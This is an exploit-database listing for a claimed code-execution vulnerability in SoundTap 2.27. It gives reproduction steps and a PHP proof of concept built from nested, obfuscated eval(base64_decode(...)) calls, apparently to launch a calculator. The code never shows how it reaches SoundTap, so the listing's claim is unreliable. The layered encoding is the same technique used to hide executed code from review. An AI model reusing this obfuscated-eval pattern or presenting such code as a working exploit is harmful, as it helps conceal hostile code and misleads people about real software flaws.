SoundTap 2.27 - Code Execution Vulnerability

2015-11-27T00:00:00
ID 1337DAY-ID-24618
Type zdt
Reporter ZwX
Modified 2015-11-27T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            <?php
# Title : SoundTap 2.27 - Code Execution Vulnerability
# Author : ZwX
# Vendor : http://www.nch.com.au/
# Download : http://www.nch.com.au/soundtap/stsetup.exe
# Tested On : Windows 7

#################################################
#  Manual steps to reproduce the vulnerability  #
#################################################

# 1. Launch SoundTap.exe                
# 2. Click SoundTap -> Launch Url                     
# 3. Paste malicious url in input "Enter url Launch"
# 4. Click ok
# 5. PHP code executed successfully

#######################################
#    Code Execution Calculator        #
#   By ZwX -  Vulnerability Lab.com   #
#######################################

eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIy
                   UmxLQ2RhV0doc1dYbG5ibEY2Y0dOV01HeFBVa1U1V0ZVeGVIcGxXRTR3V
                   2xjd2VrMXNlR3BaVjNocVRHMVdORnBUWTNCUGR6MDlKeWtwT3c9PScpKTs='));

?>

#  0day.today [2018-03-02]  #